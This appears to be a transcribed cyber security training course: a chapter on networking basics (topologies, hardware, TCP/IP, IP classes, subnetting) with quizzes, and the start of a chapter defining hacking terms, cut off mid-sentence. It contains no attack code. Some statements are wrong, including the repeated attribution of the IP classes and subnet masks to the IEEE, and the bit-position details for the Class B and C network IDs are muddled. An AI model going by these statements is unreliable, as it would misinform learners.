Basics of Networking

Transcription

Chapter-1
Basics of Networking
Session Objectives:
At the end of this Session, you will be able to understand –
Types of Network Configuration
Network Transmission Technologies
Types of Network
Basic Types of Topologies
Network Hardware Components
The TCP/IP Reference Model
Protocols and Networks in the TCP/IP Model Initially
IP Address Classes and Structure
_______________________________________________________________________________________
Cyber Security Level -1 /1
INTRODUCTION_________________________________
“Computer Networking” is the Engineering Discipline with Communication between
computer Systems or Devices. Networking is sometimes considered as a SubDisciplined of Telecommunications, Computer Science, Information Technology, and
Computer Engineering. Networking is any set of computers connected to each other
with the ability to exchange the data. Computer network is the collection of network
hardware like LAN’s, MAN’s, WAN’s, routers, hubs, protocols etc, thus it is a collection
of interconnected collection of autonomous computers. The two computers are said to
be interconnected if they are able to exchange information may be via copper wires,
fiber optics, satellite communication etc. But if one computer can forcibly start, stop, or
control another one, the computers are not autonomous. A system with one control unit
and many salves is not a network; nor is a large computer with remote printers and
terminals.
1.1 Types of Network Configuration________________
There are two types of network configuration,
1. Peer-to-Peer Networks
2. Client/ Server Networks.
1.1.1 Peer-to-peer networks
Peer-to-peer networks are more commonly implemented where less then 10
computers are involved and where strict security is not required. All computers have the
same status, hence the term 'Peer', is associated along with such type of Networks.
They communicate with each other on similar kind of layers (OSI/ TCPIP) where Files/
Folders, such as word processing or spreadsheet documents, can be shared across the
network and all the computers on the same network can share devices, like printers,
scanners, Drives etc, which are connected to any computer.
Peer to Peer
Figure 1.1
_______________________________________________________________________________________
1.1.2 Client/ Server networks
Client/Server is an architecture where Server serves the services to all of its Clients on
the same Network. It is more suitable in the scenario where large numbers of computers
are required in the same Network. A central computer, or 'Server', acts as the storage
location for the files and applications shared on the network. Usually the Server
Configuration is higher than average performance computer. The server also controls
the Network access or User Authentication of other computers which are referred to the
'client' computers.
File
Server
Figure 1.2
1.2 NETWORK TRANSMISSION TECHNOLOGIES_____
The computer networks are broadly divided into two transmission technologies:
1. Broadcast Network
2. Point to Point Network
1.2.1 Broadcast networks
have a single communication channel that is
shared by all the machines on the network. Short messages, called packets in certain
contexts, sent by any machine are received by all the computers, where an address field
within packet checks; for whom it is intended. The receiving machine checks this
address field for which it is intended for, and then it receives the packet otherwise
rejects it. If a message is sent to all the machines on the same network, it is known as
Broadcasting.
1.2.2 Point to Point Networks
consists of many connections between
individual pairs of machines. To go from a source to destination machine, a packet has
to first visit one or more intermediate machines. Often multiple routes, of different
lengths are possible, so routing algorithms play an important role in point to point
networks.
_______________________________________________________________________________________
1.3 TYPES OF NETWORK_________________________
1.3.1 LOCAL AREA NETWORKS
Local Area Networks, which are also known as LAN’s are privately owned networks
within a single building or campus of up to a few kilometers range in distance. They are
widely used to connect personal computers and workstations in companies, offices and
factories in order to share resources and exchange information.
Figure 1.3
1.3.2 METROPOLITIAN AREA NETWORK
A Metropolitan Area Network or MAN is basically larger version of LAN and normally
uses similar technology. It might cover a group of nearby corporate offices or a city and
might be either private or public. A MAN can Support both voice and data and might
even be related to the local television network. A MAN just has one or two cables and
does not contain switching elements.
Figure 1.4
_______________________________________________________________________________________
1.3.3 WIDE AREA NETWORKS
A Wide Area Network or WAN, spans a large geographical area often a country or a
continent. It contains a collection of machines intended for running machines host. The
hosts are connected by a communication subnet or just subnet for short. The job of the
subnet is to carry messages from the host to host, just as telephone system carries
word from the speaker to the listener. It basically consists of transmission lines and
switching elements where Transmission lines are used to move bits around and
switching elements are specialized computers used to connect two or more
transmission elements.
All networks are made up of basic hardware building blocks to interconnect network
nodes, such as Network Interface Cards (NICs), Bridges, Hubs, Switches, and Routers.
In addition, some methods of connecting these building blocks are required, usually in
the form of galvanic cable (most commonly Category 5/6 cable). Moreover, now a days
Wireless Technology has started playing an important role in case of such type of
Networking by using Wi-Fi/ Wi-MAx.
1.1, 1.2, 1.3 Check your Progress
Fill in the blanks
1) The server also controls the Network access or User Authentication of other computers which are
referred to the _______ computers.
2) If a message is sent to all the machines on the same network, it is known as ________.
3) A ________ spans a large geographical area often a country or a continent. It contains a collection of
machines intended for running machines host.
4) A ________ is basically larger version of LAN and normally uses similar technology.
1.4 Types of Topologies__________________________
The arrangement or mapping of the elements of a network gives rise to certain basic
topologies which may then be combined to form more complex topologies (hybrid
topologies). The most common types of topologies are as follows:
Star
Ring
Mesh
Tree
Hybrid
_______________________________________________________________________________________
Figure 1.5
1.5 NETWORK HARDWARE COMPONENTS__________
1.5.1 Network Interface Cards
A network card, network adapter or NIC (network interface card) is a piece of
computer hardware designed to allow computers to communicate over a computer
network. It provides physical access to a networking medium and provides a low-level
addressing system through the use of MAC addresses. It allows users to connect to
each other either by using cables or wirelessly.
Figure 1.6 Network Interface Cards (NICs)
Bridges
A network bridge connects multiple network segments at the data link layer (layer 2) of
the OSI model. Bridges are similar to repeaters or network hubs, devices that connect
network segments at the physical layer, however a bridge works by using bridging
where traffic from one network is managed rather than simply rebroadcast to adjacent
network segments.
Hubs
A hub is a piece of hardware which provides the connectivity of a segment of a network
by directing traffic through the network. It does this in a rudimentary way, which simply
copies the data to all of the Nodes connected to the hub. Hubs are commonly used to
connect segments of a LAN. A hub contains multiple ports. When a packet arrives at
_______________________________________________________________________________________
one port, it is copied to the other ports so that all segments of the LAN can see all
packets.
Figure 1.7 An 8 port Hub
Switches
Switches are the device of networking that directs traffic to the correct node by filtering
and forwarding packets between Nodes. Switches operate at the data link layer (layer 2)
and sometimes the network layer (layer 3) of the OSI Reference Model and therefore
support any packet protocol. LANs that use switches to join segments are called
switched LANs or, in the case of Ethernet networks, switched Ethernet LANs. In a
circuit-switched data network, a switch is used to create a virtual circuit between the
pairs of endpoints. This means that it creates a path to the destination node from the
source node.
Figure 1.8 Examples of 24 port Switches
Routers
Routers are the networking device that forwards data packets along networks by using
headers and forwarding tables to determine the best path to forward the packets.
Routers also provide interconnectivity between like and unlike devices on the network.
This is accomplished by examining the Header of a data packet. They use protocols
such as ICMP to communicate with each other and configure the best route between
any two hosts. A router is connected to at least two networks, commonly two LANs or
WANs or a LAN and its ISP's network. Routers are usually located at gateways, the
places where two or more networks connect. Many household DSL and Cable Modems
are also routers.
A registered jack (RJ) is a standardized physical interface for connecting
telecommunications equipment (commonly, a telephone jack) or computer networking
equipment. The standard designs for these connectors and their wiring are named
RJ11, RJ14, RJ45, etc. These interface standards are most commonly used in North
America, though some interfaces are used world-wide
_______________________________________________________________________________________
Figure 1.9
1.5.2 CABLING
Introduction
Unshielded Twisted Pair cable is most certainly by far the most popular cable around
the world. UTP cable is used not only for networking but also for the traditional
telephone (UTP-Cat 1). There are 6 different types of UTP categories and, depending
on what you want to achieve, you would need the appropriate type of cable. UTP-CAT5
is the most popular UTP cable; it came to replace the good old coaxial cable which was
not able to keep up with the constant growing need for faster and more reliable
networks.
Characteristics
The characteristics of UTP are very good and make it easy to work with, install, expand
and troubleshoot and we are going to look at the different wiring schemes available for
UTP, how to create a straight through UTP cable, rules for safe operation and a lot of
other cool stuff !
So let's have a quick look at each of the UTP categories available today:
_______________________________________________________________________________________
Figure 1.10
Category 1/2/3/4/5/6 – a specification for the type of copper wire (most telephone and
network wire is copper) and jacks. The number (1, 3, 5, etc) refers to the revision of the
specification and in practical terms refers to the number of twists inside the wire (or the
quality of connection in a jack).
CAT1 is typically telephone wire. This type of wire is not capable of supporting computer
network traffic and is not twisted. It is also used by phone companies who provide ISDN,
where the wiring between the customer's site and the phone company's network uses
CAT 1 cable.
CAT2, CAT3, CAT4, CAT5 and CAT6 are network wire specifications. This type of wire
can support computer network and telephone traffic. CAT2 is used mostly for token ring
networks, supporting speeds up to 4 Mbps. For higher network speeds (100Mbps plus)
you must use CAT5 wire, but for 10Mbps CAT3 will suffice. CAT3, CAT4 and CAT5
cable are actually 4 pairs of twisted copper wires and CAT5 has more twists per inch
than CAT3 therefore can run at higher speeds and greater lengths. The "twist" effect of
each pair in the cables will cause any interference presented/picked up on one cable to
be cancelled out by the cable's partner which twists around the initial cable. CAT3 and
CAT4 are both used for Token Ring and have a maximum length of 100 meters.
CAT6 wire was originally designed to support gigabit Ethernet (although there are
standards that will allow gigabit transmission over CAT5 wire, that's CAT 5e). It is similar
to CAT5 wire, but contains a physical separator between the 4 pairs to further reduce
electromagnetic interference.
_______________________________________________________________________________________
THE OSI REFERENCE MODEL
The concept of how a modern day network operates can be understood by dissecting it
into seven layers. This seven layer model is known as the OSI Reference Model and
defines how the vast majority of the digital networks on earth function. OSI is the
acronym for Open Systems Interconnection, which was an effort formed by the
International Organization for Standardization in 1982 with the goal of producing a
standard reference model for the hardware and software connection of digital
equipment. The important concept to realize about the OSI Reference Model is that it
does not define a network standard, but rather provides guidelines for the creation of
network standards.
The OSI model has become as accurate as a concept that almost all major network
standards are used entirely to its seven layer model in the industry. Though seven
layers may appear to make a network overly complex however, the seven layers OSI
Model has been proven over the past twenty years to be the most efficient and effective
way to understand this extremely complex subject.
Figure 1.11
1.4, 1.5 Check your Progress
Fill in the blanks
1) A __________ connects multiple network segments at the data link layer (layer 2) of the OSI model.
2) __________ is a piece of computer hardware designed to allow computers to communicate over a
computer network.
3) __________ also provide interconnectivity between like and unlike devices on the network.
4) __________ is typically telephone wire.
_______________________________________________________________________________________
1.6 The TCP/IP Reference Model___________________
Let us now move on to the TCP/IP reference model that is used in the Wide Area
Computer Networks, for the successful operating of worldwide Internet. This architecture
was started in 1974, which was different from its predecessor by layers functionalities.
The TCP/IP model is not same as OSI model. There is no universal agreement
regarding how to define TCP/IP with a layered model but it is generally agreed that there
are fewer layers than the seven layers of the OSI model. TCP/IP model is defined in 4
layers that are as mentioned as below:
Figure 1.12
1) Internet layer:
Packet switching network depends upon a connectionless Internetwork layer. This layer
is known as internet layer, is the linchpin that holds the whole design together. Its job is
to allow hosts to insert packets into any network and have them to deliver independently
to the destination. They may appear in a different order than they were sent in each
case it is job of higher layers to rearrange them in order to deliver them to proper
destination.
The internet layer specifies an official packet format and protocol known as internet
protocol. The job of internet layer is to transport IP packets to appropriate destination.
Packet routing is very essential task in order to avoid congestion. For these reason it is
say that TCP/IP internet layer perform same function as that of OSI network layer.
2) Transport layer:
In the TCP/IP model, the layer above the internet layer is known as transport layer. It is
developed to permit entities on the source and destination hosts to carry on a
conversation. It specifies 2 end-to-end protocols
_______________________________________________________________________________________
a) TCP
It is a reliable connection-oriented protocol that permits a byte stream originating on one
machine to be transported without error on any machine in the internet. It divides the
incoming byte stream into discrete message and passes each one onto the internet
layer. At the destination, the receiving TCP process collects the received message into
the output stream. TCP deals with flow control to make sure a fast sender cannot
swamp a slow receiver with more message than it can handle.
b) UDP
It is an unreliable, connectionless protocol for applications that do not want TCP’s
sequencing on flow control and wish to offer their own. It is also used for client-server
type request-reply queries and applications in which prompt delivery is more important
than accurate delivery such as transmitting speech or video.
3) Application Layer:
In TCP/IP model, session or presentation layer are not present. Application layer is
present on the top of the Transport layer. It includes all the higher-level protocols which
are virtual terminal (TELNET), file transfer (FTP) and electronic mail (SMTP).
The virtual terminal protocol permits a user on one machine to log into a distant machine
and work there. The file transfer protocol offers a way to move data efficiently from one
machine to another. Electronic mail was used for file transfer purpose but later a
specialized protocol was developed for it. The Application Layer defines following
protocols
a) File Transfer Protocol (FTP)
It was designed to permit reliable transfer of files over different platforms. At the
transport layer to ensure reliability, FTP uses TCP. FTP offers simple commands and
makes the differences in storage methods across networks transparent to the user. The
FTP client is able to interact with any FTP server; therefore the FTP server must also be
able to interact with any FTP client. FTP does not offer a user interface, but it does offer
an application program interface for file transfer. The client part of the protocol is called
as FTP and the server part of the protocol is known as FTPd. The suffix "d" means
Daemon this is a legacy from UNIX computing where a daemon is a piece of software
running on a server that offers a service.
b) Hyper Text Transfer Protocol
_______________________________________________________________________________________
HTTP permits applications such as browsers to upload and download web pages. It
makes use of TCP at the transport layer again to check reliability. HTTP is a
connectionless protocol that sends a request, receives a response and then disconnects
the connection. HTTP delivers HTML documents plus all of the other components
supported within HTML such as JavaScript, Visual script and applets.
c) Simple Mail Transfer Protocol
By using TCP, SMTP sends email to other computers that support the TCP/IP protocol
suite. SMTP provides extension to the local mail services that existed in the early years
of LANs. It supervises the email sending from the local mail host to a remote mail host.
It is not reliable for accepting mail from local users or distributing received mail to
recipients this is the responsibility of the local mail system. SMTP makes use of TCP to
establish a connection to the remote mail host, the mail is sent, any waiting mail is
requested and then the connection is disconnected. It can also return a forwarding
address if the intended recipient no longer receives email at that destination. To enable
mail to be delivered across differing systems, a mail gateway is used.
d) Simple Network Management Protocol
For the transport of network management information, SNMP is used as standardized
protocol. Managed network devices can be cross examined by a computer running to
return details about their status and level of activity. Observing software can also trigger
alarms if certain performance criteria drop below acceptable restrictions. At the transport
layer SNMP protocol uses UDP. The use of UDP results in decreasing network traffic
overheads.
4) The Host to Network Layer:
Below the internet layer is great void. The TCP/IP reference model does not really say
such about what happen here, except to point out that the host has connect to the
network using some protocol so it can transmit IP packets over it. This protocol is not
specified and varies from host to host and network to network.
Fill in the blanks
1) _________ network depends upon a connectionless Internetwork layer.
2) _________ is a reliable connection-oriented protocol that permits a byte stream originating on one
machine to be transported without error on any machine in the internet.
3) _________ is an unreliable, connectionless protocol for applications that do not want TCP’s
sequencing on flow control and wish to offer their own.
_______________________________________________________________________________________
4) By using TCP, _________ sends email to other computers that support the TCP/IP protocol suite.
1.8 IP Address Classes and Structure_______________
When the IEEE committee sat down to sort out the range of numbers that were going to
be used by all computers, they came out with 5 different ranges or, as we call them,
"Classes" of IP Addresses and when someone applies for IP Addresses they are given a
certain range within a specific "Class" depending on the size of their network.
To keep things as simple as possible, let's first have a look at the 5 different Classes:
Figure 1.13
In the above table, you can see the 5 Classes. A is a First Class and E is our last Class.
The first 3 classes (A, B and C) are used to identify workstations, routers, switches and
other devices whereas the last 2 Classes (D and E) are reserved for special use.
As you would already know an IP Address consists of 32 Bits, which means it's 4 bytes
long. The first octet (first 8 Bits or first byte) of an IP Address is enough for us to
determine the Class to which it belongs. And, depending on the Class to which the IP
Address belongs, we can determine which portion of the IP Address is the Network ID
and which the Node ID.
For example, if I told you that the first octet of an IP Address is "168" then, using the
above table, you would notice that it falls within the 128-191 range, which makes it a
Class B IP Address.
1.8.1 Understanding the Classes
We are now going to have a closer look at the 5 Classes. If you remember earlier I
mentioned that companies are assigned different IP ranges within these classes,
depending on the size of their network. For instance, if a company required 1000 IP
_______________________________________________________________________________________
Addresses it would probably be assigned a range that falls within a Class B network
rather than a Class A or C.
The Class A, IP Addresses were designed for large networks, Class B for medium size
networks and Class C for smaller networks.
1.8.2 Introducing Network ID and Host ID concepts
We need to understand the Network ID and Host ID concept because it will help us to
fully understand why Classes exist. Putting it as simply as possible, an IP Address gives
us 2 pieces of valuable information:
1) It tells us which network the device is part of (Network ID).
2) It identifies that unique device within the network (Host ID/ Node ID).
Think of the Network ID as the suburb you live in and the Host ID your street in that
suburb. You can tell exactly where someone is if you have their suburb and street name.
In the same way, the Network ID tells us which network a particular computer belongs to
and the Host ID identifies that computer from all the rest that reside in the same
network.
The picture below gives you a small example to help you understand the concept:
Figure 1.14
Explanation:
In the above picture, you can see a small network. We have assigned a Class C IP
Range for this network. Remember that Class C IP Addresses are for small networks.
Looking now at Host A, you will see that its IP Address is 192.168.0.2. The Network ID
portion of this IP Address is in blue, while the Host ID is in orange.
_______________________________________________________________________________________
I suppose the next question someone would ask is: How do I figure out which portion of
the IP Address is the Network ID and which is the Host ID?
That's what we are going to answer next.
1.8.3 The Network and Host ID of each Class
The network Class helps us determine how the 4 byte, or 32 Bit, IP Address is divided
between network and node portions. The table below shows you (in binary) how the
Network ID and Host ID changes depending on the Class:
Figure 1.15
Explanation:
The table above might seem confusing at first but it's actually very simple. We will take
Class A as an example and analyse it so you can understand exactly what is happening
here:
Any Class A network has a total of 7 bits for the Network ID (bit 8 is always set to 0) and
24 bits for the Host ID. Now all we need to do is calculate how much 7 bits is:
2 to the power of 7 = 128 Networks and for the hosts : 2 to the power of 24 = 16,777,216
hosts in each Network, of which 2 cannot be used because one is the Network Address
and the other is the Network Broadcast address (see the table towards the end of this
page). This is why when we calculate the "valid" hosts in a network we always subtract
"2". So if I asked you how many "valid" hosts can you have a on Class A Network, you
should answer 16,777,214 and NOT 16,777,216.
Below you can see all this in one picture:
_______________________________________________________________________________________
Figure 1.16
The same story applies for the other 2 Classes we use, that's Class B and Class C, the
only difference is that the number of networks and hosts changes because the bits
assigned to them are different for each class.
Class B networks have 14 bits for the Network ID (Bits 15, 16 are set and can't be
changed) and 16 bits for the Host ID, that means you can have up to '2 to the power of
14' = 16,384 Networks and '2 to the power of 16' = 65,536 Hosts in each Network, of
which 2 cannot be used because one is the Network Address and the other is the
Network Broadcast address (see the table towards the end of this page). So if I asked
you how many "valid" hosts can you have a on Class B Network, you should answer
65,534 and NOT 65,536.
Figure 1.17
_______________________________________________________________________________________
Class C networks have 21 bits for the Network ID (Bits 22, 23, 24 are set and can't be
changed) and 8 bits for the Host ID, that means you can have up to '2 to the power of
21' = 2,097,152 Networks and '2 to the power of 8' = 256 Hosts in each Network, of
which 2 cannot be used because one is the Network Address and the other is the
Network Broadcast address (see the table towards the end of this page). So if I asked
you how many "valid" hosts can you have a on Class C Network, you should answer
254 and NOT 256.
Now, even though we have 3 Classes of IP Addresses that we can use, there are some
IP Addresses that have been reserved for special use. This doesn't mean you can't
assign them to a workstation but in the case that you did, it would create serious
problems within your network. For this reason it's best that you avoid using these IP
Addresses.
The following table shows the IP Addresses that you should avoid using:
IP Address
Function
Network 0.0.0.0
Refers to the default route. This route is to simplify routing
tables used by IP.
Network 127.0.0.0
Reserved for Loopback. The Address 127.0.0.1 is often used to
refer to the local host. Using this Address, applications can
address a local host as if it were a remote host.
IP Address with all
Refers to the actual network itself. For example, network
host bits set to "0"
192.168.0.0 can be used to identify network 192.168. This type
(Network Address)
of notation is often used within routing tables.
e.g 192.168.0.0
IP Address with all
node bits set to "1"
(Subnet / Network
Broadcast)
e.g
192.168.255.255
IP Addresses with all node bits set to "1" are local network
broadcast addresses and must NOT be used.
Some examples: 125.255.255.255 (Class A), 190.30.255.255
(Class B), 203.31.218.255 (Class C). See "Multicasts" &
"Broadcasts" for more info.
IP Address with all
bits set to "1" The IP Address with all bits set to "1" is a broadcast address
(Network
and must NOT be used. These are destined for all nodes on a
Broadcast)
e.g network, no matter what IP Address they might have.
255.255.255.255
_______________________________________________________________________________________
1.8.4 What is Subnetting?
When we Subnet a network, we basically split it into smaller networks. For example,
when a set of IP Addresses is given to a company, e.g 254 they might want to "break"
(the correct term is "partition") that one network into smaller ones, one for each
department. This way, their Technical department and Management department can
each have a small network of their own. By Subnetting the network we can partition it to
as many smaller networks as we need and this also helps reduce traffic and hides the
complexity of the network.
By default, all type of Classes (A, B and C) have a subnet mask, we call it the "Default
Subnet mask". You need to have one because:
1) All computers need the subnet mask field filled when configuring IP
2) You need to set some logical boundaries in your network
3) You should at least enter the default subnet mask for the Class you're using
about IP Classes, Network IDs and Host IDs, the fact is that the Subnet mask is what
determines the Network ID and Host ID portion of an IP Address.
The table below shows clearly the subnetmask that applies for each network Class.
Figure 1.18
When dealing with subnet masks in the real world, we are free in most cases to use any
type of subnet mask in order to meet our needs. If for example we require one network
which can contain up to 254 computers, then a Class C network with its default subnet
mask will do fine, but if we need more, then we might consider a Class B network with
its default subnet mask.
!Note that the default subnet masks have been set by the IEEE committee, the same
guys that set and approve the different standards and protocols.
We will have a closer look at this later on and see how we can achieve a Class C
network with more than 254 hosts.
_______________________________________________________________________________________
1.8.5 Understanding the concept
Let's stop here for one moment and have a look at what I mean by partitioning one
network into smaller ones by using different subnet masks.
The picture below shows our example network (192.168.0.0). All computers here have
been configured with the default Class C subnet mask (255.255.255.0):
Figure 1.19
Because of the subnet mask we used, all these computers are part of the one network
marked in blue. This also means that any one of these hosts (computers, router and
server) can communicate with each other.
If we now wanted to partition this network into smaller segments, then we would need to
change the subnet mask appropriately so we can get the desired result. Let's say we
needed to change the subnet mask from 255.255.255.0 to 255.255.255.224 on each
configured host.
The picture below shows us how the computers will see the network once the subnet
mask has changed:
_______________________________________________________________________________________
Figure 1.20
In reality, we have just created 8 networks from the one large (blue) network we had, but
I am keeping things simple for now and showing only 2 of these smaller networks
because I want you to understand the concept of subnetting and see how important the
subnet mask is.
In the next pages which are to follow I will analyse in great depth the way subnetting
works and how to calculate it. It is very important that you understand the concepts
introduced in this section, so make sure you do, before continuing!
1.8.6 Subnetting Analysis
Understanding the use, and analysing different subnet masks
We know what a subnet mask is, but we haven't spoken (yet) about the different values
they take, and the guidelines we need when we use them. That's what we are going to
do here !
The truth is that you cannot take any subnet mask you like and apply it to a computer or
any other device, because depending on the random subnet mask you choose, it will
either create a lot of routing and communication problems, or it won't be accepted at all
by the device you're trying to configure.
For this reason we are going to have a look at the various subnet masks so you know
exactly what you need to use, and how to use it. Most important, we are going to make
sure we understand WHY you need to choose specific subnet masks, depending on
your needs. Most people simply use a standard subnet mask without understanding
what that does. This is not the case for the visitors to this site. Let's first have a look at
the most common subnet masks and then I'll show you where these numbers come
from :)
_______________________________________________________________________________________
Common Subnet Masks
In order to keep this place tidy, we are going to see the common Subnet masks for each
Class. Looking at each Class's subnet mask is possibly the best and easiest way to
learn them.
Numer of bits
Class A
Class B
Class C
255.0.0.0
(default_mask)
255.255.0.0
(default_mask)
255.255.255.0
(default_mask)
1
255.128.0.0
(default +1)
255.255.128.0
(default+1)
255.255.255.128
(default+1)
2
255.192.0.0
(default+2)
255.255.192.0
(default+2)
255.255.255.192
(default+2)
3
255.224.0.0
(default+3)
255.255.224.0
(default+3)
255.255.255.224
(default+3)
4
255.240.0.0
(default+4)
255.255.240.0
(default+4)
255.255.255.240
(default+4)
5
255.248.0.0
(default+5)
255.255.248.0
(default+5)
255.255.255.248
(default+5)
6
255.252.0.0
(default+6)
255.255.252.0
(default+6)
255.255.255.252
(default+6)
7
255.254.0.0
(default+7)
255.255.254.0
(default+7)
255.255.255.254
(default+7) * Only 1
Host per subnet
8
255.255.0.0
(default+8)
255.255.255.0
(default+8)
255.255.255.255
(default+8) * Reserved
for Broadcasts
0 (default mask)
The above table might seem confusing at first, but don't despair! It's simple; really, you
just need to look at it in a different way! The trick to understanding the pattern of the
above table is to think of it in the following way: Each Class has its default subnet mask,
which I have noted using the Green colour, and all we are doing is borrowing a Bit at a
time (starting from 1, all the way to 8) from the Host ID portion of each class. I have
used various colours to show you the decimal numbers that we get each time we borrow
_______________________________________________________________________________________
a bit from the Host ID portion. If you can't understand how these decimal numbers work
out, then you should read up on the Binary & IP page. Each time we borrow a bit from
the Host ID, we split the network into a different number of networks. For example, when
we borrowed 3 Bits in the Class C network, we ended up partitioning the network into 8
smaller networks. Let's take a look at a detailed example (which we will break into three
parts) so we can fully understand all the above.
Here, We are going to do an analysis using the Class C network and 3 Bits which we
took from the Host ID. The analysis will take place once we convert our decimal
numbers to binary, something that's essential for this type of work. We will see how we
get 8 networks from such a configuration and their ranges!
Figure 1.21
In this first part, we can see clearly where the 8 Networks come from. The rule applies to
all types of Subnets, no matter what Class they are. Simply take the Subnet Bits and
place them into the power of 2 and you get your Networks. Now, that was the easy part.
The second part is slightly more complicated and I need you focused so you don't get
mixed up! At first the diagram below seems quite complex, so try to follow me as we go
through it:
_______________________________________________________________________________________
Figure 1.22
The IP Address and Subnet mask is show in Binary format. We focus on the last octet
which contains all the information we are after. Now, the last octet has 2 parts, the
Subnet ID and Host ID. When we want to calculate the Subnets and Hosts, we deal with
them one at a time. Once that's done, we put the Subnet ID and Host ID portion together
so we can get the last octet’s decimal number.
We know we have 8 networks (or subnets) and, by simply counting or incrementing our
binary value by one each time, we get to see all the networks available. So we start off
with 000 and finish at 111. On the right hand side I have also put the equivalent decimal
number for each network. Next we take the Host ID portion, where the first available
host is 0 0001 (1 in Decimal), because the 0 0000 (0 in Decimal) value is reserved as it
is the Network Address (see IP Classes page), and the last value which is 1 1111 (31 in
decimal) is used as a Broadcast Address for each Subnet (see Broadcast page).
_______________________________________________________________________________________
!Note
I've given a formula in the IP Classes page that allows you to calculate the available hosts, that's exactly
what we are doing here for each subnet. This formula is: 2 to the power of X -2. Where X is the number of
Bits we have in the Host ID field, which for our example is 5. When we apply this formula, we get 2 to the
power of 5 - 2 = 30 Valid (usable) IP Addresses. If you're wondering why we subtract 2, it's because one
is used for the Network Address of that subnet and the other for the Broadcast Address of that subnet.
This shouldn't be new news to anyone :)
Summing up, these are the ranges for each subnet in our new network:
Figure 1.23
_______________________________________________________________________________________
Figure 1.24
1.8 Check your Progress
Fill in the blanks
1)
2)
3)
4)
5)
IP Address consists of __________ Bits.
__________ identifies that unique device within the network.
The Address __________ is often used to refer to the local host.
When we Subnet a network, we basically __________it into smaller networks.
If Subnet mask is 255.255.255.254 then network with only __________ Host per subnet can be
configured.
Check Your Progress Answers:
1.1, 1.2, 1.3
1)
2)
3)
4)
client
Broadcasting
WAN
MAN
1.4, 1.5
1)
2)
3)
4)
Network bridge
NIC
Routers
CAT1
1.6,1.7
1) Packet switching
_______________________________________________________________________________________
2) TCP
3) UDP
4) SMTP
1.8
1)
2)
3)
4)
5)
32
Host ID
127.0.0.1
split
One
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-2
Introduction to Cyber Security & Ethical
Hacking
Session Objectives:
Why Is Cyber Security A Problem?
What Is Hacking?
Essential Terminology Used In Hacking
What Does A Malicious Hacker / Crackers Do?
What Do Ethical Hackers Do?
Hacktivism & Computer Crimes and Implications
Types of Cyber Crime
Indian It Act 2000
What is Social Engineering?
What is Reverse Social Engineering?
_______________________________________________________________________________________
Introduction____________________________________
Why Cyber Security?
You must have heard various news and stories about credit card numbers being stolen
and email viruses spreading. Maybe you've even been a victim of yourself. One of the
best defenses is to understand the risks, understand some of the basic terms of Cyber
Crime, and how to protect you against them.
2.1 What is cyber security?_______________________
It seems that everything relies on computers and the Internet now a days like
communication (email, cell phones), entertainment (digital cable, mp3s), transportation
(car engine systems, airplane navigation), shopping (online stores, credit/ debit cards),
medicine (equipment, medical records), and the list goes on. How much of your daily life
relies on computers? How much of your personal information is stored either on your
own computer or on someone else's system? Cyber security involves protecting that
information by preventing, detecting, and responding to different attacks.
2.2 What is Hacking?____________________________
Hacking means illegally accessing other's computer systems for destroying, disrupting
or carrying out illegal activities on the network or on computer systems.
2.2.1 Who are Hackers?
HACKER noun A person who enjoys learning the details of computer systems and how
to stretch their capabilities—as opposed to most users of computers, who prefer to learn
only the minimum amount necessary. One who programs enthusiastically or who enjoys
programming rather than just theorizing about programming.
2.2.2 What is Ethical Hacking?
In today’s Modernization, where computer security has become a major concern for all
the businesses and governments With the growth of the Internet, where they also want
to take the advantage of the Internet for E-commerce, Advertising, Information
distribution/ access, and other pursuits, however they are worried about the possibility of
being “hacked.” At the same time, the potential customers of these services are worried
about maintaining control of personal information that varies from credit card numbers to
social security numbers and home addresses. In their search for a way to approach the
problem, organizations realized that one of the best ways to evaluate the intruder threat
to their interests would be to have Independent Computer Security Professionals who’ll
attempt to break into their computer systems.
_______________________________________________________________________________________
In the case of computer security “Ethical Hackers” would employ the same tools and
techniques as the intruders, but they would neither damage the target systems nor steal
any information.
Instead, they would evaluate the target systems' security and report back to the owners
with the vulnerabilities they found and instructions for how to remedy them.
2.2.3 Who are Ethical Hackers?
These are the security professionals who use their knowledge and skills for defensive
purposes and help to solve the cyber security frauds.
2.2.4 Who are crackers?
These are the people who indulge in cyber crimes and frauds and use their knowledge
for offensive purposes. These are really the bad guys who indulge in cyber criminal
activities.
2.2.5 Hackers Vs Crackers
Features of Hackers
"
"
"
"
"
Lots of Knowledge, Experience & Skill
Good Guys
Strong Ethics
Never Indulge in Cyber Crime
Catches Computer Criminals
Features of Crackers
"
"
"
"
"
Lots of Knowledge, Experience & Skill
Bad Guys
Low Ethics
Mostly Indulge in Crime
Is a Computer Criminal Itself
_______________________________________________________________________________________
2.2.6 Classes of Hackers
Hackers are basically classified into three types
" Black Hat Hackers
# Individuals with extraordinary computing skill restoring to malicious or
destructive activities are known as Crackers or Black Hat Hacker’s.
"
White Hat Hackers
# Individuals professing hacking skills and using them for defensive purposes
along with the ethics are known as White Hat Hackers or Security Analyst.
" Grey Hat Hackers
# Individuals who work both offensively and defensively at various times as per
their benefits are known as Grey Hat Hackers.
Fill in the blanks
1) Cyber security involves protecting that information by preventing, __________, and __________ to
different attacks.
2) __________ are the people who indulge in cyber crimes and frauds and use their knowledge for
offensive purposes.
3) Individuals professing hacking skills and using them for defensive purposes along with the ethics are
known as __________ or Security Analyst.
4) Individuals who work both offensively and defensively at various times as per their benefits are known
as __________.
2.3 Terminologies used in Hacking_________________
Threat – An action or event that might prejudice security. A threat is a potential
violation of security.
Vulnerability – Existence of a weakness, design, or implementation error that can lead
to an unexpected, undesirable event compromising the security of the system.
Target of Evaluation – An IT system, product, or component that is identified/
subjected as requiring security evaluation.
Attack – An assault on system security that derives from an intelligent threat. An attack
is any action that violates security.
Exploit – A defined way to breach the security of an IT system through vulnerability.
2.4 What does a Malicious hacker / Crackers do?_____
#
A malicious hacker tries to gather as much as information as possible about the
target of evaluation prior to launching an attack and this process of evaluation is
_______________________________________________________________________________________
#
#
#
called reconnaissance whether active or passive. It involves network scanning
